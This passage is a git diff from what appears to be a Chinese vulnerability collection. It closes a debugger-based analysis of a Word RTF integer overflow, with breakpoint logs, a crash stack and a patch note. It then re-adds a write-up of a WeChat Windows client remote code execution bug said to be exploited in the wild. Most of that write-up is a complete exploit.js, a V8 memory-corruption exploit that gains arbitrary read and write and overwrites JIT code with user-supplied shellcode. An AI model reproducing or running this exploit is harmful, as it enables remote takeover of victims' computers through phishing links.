eax, eax +.text:102F00C6 jz short loc_102F00DA +.text:102F00C8 movsx ecx, word ptr [esi]//获得 Cum +.text:102F00CB movsx edx, word ptr [esi+2]//获得 Base <---- bp2 +.text:102F00CF lea edx, [ecx+edx*2]//计算偏移 <---- bp3 +.text:102F00D2 mov cx, [eax]//获得 codepage value +.text:102F00D5 mov [esi+edx*2+4], cx//存储 codepage value <---- bp4 <- crash +.text:102F00DA inc word ptr [esi]//增加 Cum 计数 +``` + +在上述代码片段中下 4 个断点查看存储过程,注意各寄存器对应关系。 + +``` +bp wwlib+2F00A8 ".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc" +bp wwlib+2F00CB ".printf \" Base: %p \\n \", poi(esi+2); gc" +bp wwlib+2F00CF 
".printf \" Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc" +bp wwlib+2F00D5 ".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc" +``` + +崩溃前断点记录到的存储过程信息。 + +``` + ... + --------------------------------------------------------------------------------------- + Cum: 00007fec Font id: 00007fec Target addr: 3b3e0044 from 0x3b3d0068 + 0x7fec*2 + 4 + Base: 00007fee + Edx: 00017fc8 from 0x7fec + 0x7fee*2 + Target addr: 3b3ffffc from 0x3b3d0068 + 0x17fc8*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fed Font id: 00007fed Target addr: 3b3e0046 from 0x3b3d0068 + 0x7fed*2 + 4 + Base: 00007fee + Edx: 00017fc9 from 0x7fed + 0x7fee*2 + Target addr: 3b3ffffe from 0x3b3d0068 + 0x17fc9*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fee Font id: 00007fee Target addr: 3e538008 from 0x3e528028 + 0x7fee*2 + 4 + Base: 00007ff8 + Edx: 00017fde from 0x7fee + 0x7ff8*2 + Target addr: 3e557fe8 from 0x3e528028 + 0x17fde*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fef Font id: 00007fef Target addr: 3e53800a from 0x3e528028 + 0x7fef*2 + 4 + Base: 00007ff8 + Edx: 00017fdf from 0x7fef + 0x7ff8*2 + Target addr: 3e557fea from 0x3e528028 + 0x17fdf*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff0 Font id: 00007ff0 Target addr: 3e53800c from 0x3e528028 + 0x7ff0*2 + 4 + Base: 00007ff8 + Edx: 00017fe0 from 0x7ff0 + 0x7ff8*2 + Target addr: 3e557fec from 0x3e528028 + 0x17fe0*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff1 Font id: 00007ff1 Target addr: 3e53800e from 0x3e528028 + 0x7ff1*2 + 4 + Base: 00007ff8 + Edx: 00017fe1 from 0x7ff1 + 0x7ff8*2 + Target addr: 3e557fee from 0x3e528028 + 0x17fe1*2 + 4 + 
--------------------------------------------------------------------------------------- + Cum: 00007ff2 Font id: 00007ff2 Target addr: 3e538010 from 0x3e528028 + 0x7ff2*2 + 4 + Base: 00007ff8 + Edx: 00017fe2 from 0x7ff2 + 0x7ff8*2 + Target addr: 3e557ff0 from 0x3e528028 + 0x17fe2*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff3 Font id: 00007ff3 Target addr: 3e538012 from 0x3e528028 + 0x7ff3*2 + 4 + Base: 00007ff8 + Edx: 00017fe3 from 0x7ff3 + 0x7ff8*2 + Target addr: 3e557ff2 from 0x3e528028 + 0x17fe3*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff4 Font id: 00007ff4 Target addr: 3e538014 from 0x3e528028 + 0x7ff4*2 + 4 + Base: 00007ff8 + Edx: 00017fe4 from 0x7ff4 + 0x7ff8*2 + Target addr: 3e557ff4 from 0x3e528028 + 0x17fe4*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff5 Font id: 00007ff5 Target addr: 3e538016 from 0x3e528028 + 0x7ff5*2 + 4 + Base: 00007ff8 + Edx: 00017fe5 from 0x7ff5 + 0x7ff8*2 + Target addr: 3e557ff6 from 0x3e528028 + 0x17fe5*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff6 Font id: 00007ff6 Target addr: 3e538018 from 0x3e528028 + 0x7ff6*2 + 4 + Base: 00007ff8 + Edx: 00017fe6 from 0x7ff6 + 0x7ff8*2 + Target addr: 3e557ff8 from 0x3e528028 + 0x17fe6*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff7 Font id: 00007ff7 Target addr: 3e53801a from 0x3e528028 + 0x7ff7*2 + 4 + Base: 00007ff8 + Edx: 00017fe7 from 0x7ff7 + 0x7ff8*2 + Target addr: 3e557ffa from 0x3e528028 + 0x17fe7*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff8 Font id: 00007ff8 Target addr: 362defe4 from 0x362ceff0 + 0x7ff8*2 + 4 + Base: 00008002 + Edx: ffff7ffc from 0x7ff8 + 0xffff8002*2 + Target addr: 362befec from 
0x362ceff0 + 0xffff7ffc*2 + 4 +``` + +观察记录及断点处的汇编代码,发现崩溃是由 bp2 处的 movsx 指令引起的整数溢出导致。 + +![图片](images/640-16787604735695.png) + +由上图中的记录 2 可以发现,bp2 处获得的 Base 由 0x8002 变为了 edx 中的 0xffff8002,变化的原因是 movsx 指令是带符号扩展的,而 0x8002 的最高位又恰好为 1。这也就导致 bp3 处的 edx 和 bp4 处的 Target addr 整数溢出,并最终在 bp4 处发生堆损坏。 + +![图片](images/640-16787604818848.jpeg) + +Target addr 整数溢出。 + +![图片](images/640-167876049401111.jpeg) + +## 补丁分析 + +将 Office 更新到最新后再次打开 POC.rtf 发现依然会造成崩溃,不过此崩溃是 winword.exe 提前检测到即将造成堆损坏而主动引发的,另外发现微软提供了此版本 wwlib.dll 的符号文件,此栈回溯与之前的基本一致。 + +``` +(174c.149c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00008002 ebx=00007ff8 ecx=00000005 edx=ffffffff esi=7e221028 edi=00007ff8 +eip=6cccec57 esp=004f10f4 ebp=004f110c iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 +wwlib!FSearchFtcmap+0x182: +6cccec57 cd29 int 29h +0:000> kv + # ChildEBP RetAddr Args to Child +00 004f110c 6d9f1494 004f119c 00000001 004f1188 wwlib!FSearchFtcmap+0x182 (FPO: [Non-Fpo]) +01 004f35d8 6d9e347e bb594bde 1c597028 0005d400 wwlib!RtfInRare+0x1848 (FPO: [Non-Fpo]) +02 004f3a0c 6d9ff40f 00000070 1c597028 505daa50 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo]) +03 004f3c5c 6d9fecc4 1c59702c 004fa0d0 004f5a60 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo]) +04 004f3ca8 6c97a74a 40280000 00200002 56b28f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4]) +05 004f5404 6c528610 04012000 20280000 00200002 wwlib!`Mso::Details::SharedMutexPool::Get'::`2'::`dynamic atexit destructor for 's_mutexPool''+0x15be8d +06 004f5758 6c52829b 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x33a (FPO: [Non-Fpo]) +07 004f57dc 6c504161 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) +08 004f8df4 6c5001b5 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0x22eb (FPO: [Non-Fpo]) +09 004f8ebc 6d2d3628 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) +0a 004f9fe8 6d2d332e 00000000 00000000 00000002 
wwlib!FFileOpenXszCore+0x2e7 (FPO: [Non-Fpo]) +0b 004fa024 6c7b525d 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) +0c 004fb4c4 6c3cc272 00000001 00000000 6c3cc22c wwlib!IfrInitArgs+0x7ef (FPO: [Non-Fpo]) +0d 004fb6fc 6c309720 bb59c6ba 74cda210 0000000a wwlib!Boot::IfrParseCommandLine2+0x46 (FPO: [Non-Fpo]) +0e 004fb774 6c309542 004fb7a4 6c300000 6c309234 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) +0f 004ff830 6c309298 83385031 00000540 bb5989b6 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) +10 004ff864 00941917 00940000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) +11 004ffab4 0094114a 00940000 00000000 0077efd4 winword!WinMain+0x146 (FPO: [Non-Fpo]) +12 004ffb00 74cd62c4 003e5000 74cd62a0 454ba229 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) +13 004ffb14 77ae0fa9 003e5000 11605f5b 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) +14 004ffb5c 77ae0f74 ffffffff 77b02ed1 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) +15 004ffb6c 00000000 00941000 003e5000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) +``` + +补丁文件中新增的范围检测。 + ![图片](images/640-167876051833114.png) \ No newline at end of file diff --git a/其他漏洞/微信客户端 远程命令执行漏洞.md b/其他漏洞/微信客户端 远程命令执行漏洞.md index 3acf096..fc693f9 100644 --- a/其他漏洞/微信客户端 远程命令执行漏洞.md +++ b/其他漏洞/微信客户端 远程命令执行漏洞.md 
@@ -1,196 +1,196 @@ -# 微信客户端 远程命令执行漏洞 - -## 漏洞描述 - -微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 - -参考链接: - -- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ - -## 漏洞影响 - -``` -微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 -``` - -## 漏洞复现 - -[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链: - -1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。 -2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。 -3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。 - -exploit.js: - -``` -ENABLE_LOG = true; -IN_WORKER = true; - -// run calc and hang in a loop -var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的 - -function print(data) { -} - - -var not_optimised_out = 0; -var target_function = (function (value) { - if (value == 0xdecaf0) { - not_optimised_out += 1; - } - not_optimised_out += 1; - not_optimised_out |= 0xff; - not_optimised_out *= 12; -}); - -for (var i = 0; i < 0x10000; ++i) { - target_function(i); -} - - -var g_array; -var tDerivedNCount = 17 * 87481 - 8; -var tDerivedNDepth = 19 * 19; - -function cb(flag) { - if (flag == true) { - return; - } - g_array = new Array(0); - g_array[0] = 0x1dbabe * 2; - return 'c01db33f'; -} - -function gc() { - for (var i = 0; i < 0x10000; ++i) { - new String(); - } -} - -function oobAccess() { - var this_ = this; - this.buffer = null; - this.buffer_view = null; - - this.page_buffer = null; - this.page_view = null; - - this.prevent_opt = []; - - var kSlotOffset = 0x1f; - var kBackingStoreOffset = 0xf; - - class LeakArrayBuffer extends ArrayBuffer { - constructor() { - super(0x1000); - this.slot = this; - } - } - - this.page_buffer = new LeakArrayBuffer(); - this.page_view = new DataView(this.page_buffer); - - new RegExp({ toString: function () { return 'a' } }); - cb(true); - - class DerivedBase extends RegExp { - constructor() { - // var array = null; - super( - // at this point, 
the 4-byte allocation for the JSRegExp `this` object - // has just happened. - { - toString: cb - }, 'g' - // now the runtime JSRegExp constructor is called, corrupting the - // JSArray. - ); - - // this allocation will now directly follow the FixedArray allocation - // made for `this.data`, which is where `array.elements` points to. - this_.buffer = new ArrayBuffer(0x80); - g_array[8] = this_.page_buffer; - } - } - - // try{ - var derived_n = eval(`(function derived_n(i) { - if (i == 0) { - return DerivedBase; - } - - class DerivedN extends derived_n(i-1) { - constructor() { - super(); - return; - ${"this.a=0;".repeat(tDerivedNCount)} - } - } - - return DerivedN; - })`); - - gc(); - - - new (derived_n(tDerivedNDepth))(); - - this.buffer_view = new DataView(this.buffer); - this.leakPtr = function (obj) { - this.page_buffer.slot = obj; - return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); - } - - this.setPtr = function (addr) { - this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); - } - - this.read32 = function (addr) { - this.setPtr(addr); - return this.page_view.getUint32(0, true, ...this.prevent_opt); - } - - this.write32 = function (addr, value) { - this.setPtr(addr); - this.page_view.setUint32(0, value, true, ...this.prevent_opt); - } - - this.write8 = function (addr, value) { - this.setPtr(addr); - this.page_view.setUint8(0, value, ...this.prevent_opt); - } - - this.setBytes = function (addr, content) { - for (var i = 0; i < content.length; i++) { - this.write8(addr + i, content[i]); - } - } - return this; -} - -function trigger() { - var oob = oobAccess(); - - var func_ptr = oob.leakPtr(target_function); - print('[*] target_function at 0x' + func_ptr.toString(16)); - - var kCodeInsOffset = 0x1b; - - var code_addr = oob.read32(func_ptr + kCodeInsOffset); - print('[*] code_addr at 0x' + code_addr.toString(16)); - - oob.setBytes(code_addr, shellcode); - - target_function(0); -} - -try{ - print("start 
running"); - trigger(); -}catch(e){ - print(e); -} -``` - +# 微信客户端 远程命令执行漏洞 + +## 漏洞描述 + +微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 + +参考链接: + +- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ + +## 漏洞影响 + +``` +微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 +``` + +## 漏洞复现 + +[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链: + +1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。 +2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。 +3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。 + +exploit.js: + +``` +ENABLE_LOG = true; +IN_WORKER = true; + +// run calc and hang in a loop +var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的 + +function print(data) { +} + + +var not_optimised_out = 0; +var target_function = (function (value) { + if (value == 0xdecaf0) { + not_optimised_out += 1; + } + not_optimised_out += 1; + not_optimised_out |= 0xff; + not_optimised_out *= 12; +}); + +for (var i = 0; i < 0x10000; ++i) { + target_function(i); +} + + +var g_array; +var tDerivedNCount = 17 * 87481 - 8; +var tDerivedNDepth = 19 * 19; + +function cb(flag) { + if (flag == true) { + return; + } + g_array = new Array(0); + g_array[0] = 0x1dbabe * 2; + return 'c01db33f'; +} + +function gc() { + for (var i = 0; i < 0x10000; ++i) { + new String(); + } +} + +function oobAccess() { + var this_ = this; + this.buffer = null; + this.buffer_view = null; + + this.page_buffer = null; + this.page_view = null; + + this.prevent_opt = []; + + var kSlotOffset = 0x1f; + var kBackingStoreOffset = 0xf; + + class LeakArrayBuffer extends ArrayBuffer { + constructor() { + super(0x1000); + this.slot = this; + } + } + + this.page_buffer = new LeakArrayBuffer(); + this.page_view = new DataView(this.page_buffer); + + new RegExp({ toString: function () { return 'a' } }); + cb(true); + + class DerivedBase extends RegExp { + constructor() { + // var array 
= null; + super( + // at this point, the 4-byte allocation for the JSRegExp `this` object + // has just happened. + { + toString: cb + }, 'g' + // now the runtime JSRegExp constructor is called, corrupting the + // JSArray. + ); + + // this allocation will now directly follow the FixedArray allocation + // made for `this.data`, which is where `array.elements` points to. + this_.buffer = new ArrayBuffer(0x80); + g_array[8] = this_.page_buffer; + } + } + + // try{ + var derived_n = eval(`(function derived_n(i) { + if (i == 0) { + return DerivedBase; + } + + class DerivedN extends derived_n(i-1) { + constructor() { + super(); + return; + ${"this.a=0;".repeat(tDerivedNCount)} + } + } + + return DerivedN; + })`); + + gc(); + + + new (derived_n(tDerivedNDepth))(); + + this.buffer_view = new DataView(this.buffer); + this.leakPtr = function (obj) { + this.page_buffer.slot = obj; + return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); + } + + this.setPtr = function (addr) { + this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); + } + + this.read32 = function (addr) { + this.setPtr(addr); + return this.page_view.getUint32(0, true, ...this.prevent_opt); + } + + this.write32 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint32(0, value, true, ...this.prevent_opt); + } + + this.write8 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint8(0, value, ...this.prevent_opt); + } + + this.setBytes = function (addr, content) { + for (var i = 0; i < content.length; i++) { + this.write8(addr + i, content[i]); + } + } + return this; +} + +function trigger() { + var oob = oobAccess(); + + var func_ptr = oob.leakPtr(target_function); + print('[*] target_function at 0x' + func_ptr.toString(16)); + + var kCodeInsOffset = 0x1b; + + var code_addr = oob.read32(func_ptr + kCodeInsOffset); + print('[*] code_addr at 0x' + code_addr.toString(16)); + + oob.setBytes(code_addr, shellcode); + + 
target_function(0); +} + +try{ + print("start running"); + trigger(); +}catch(e){ + print(e); +} +``` +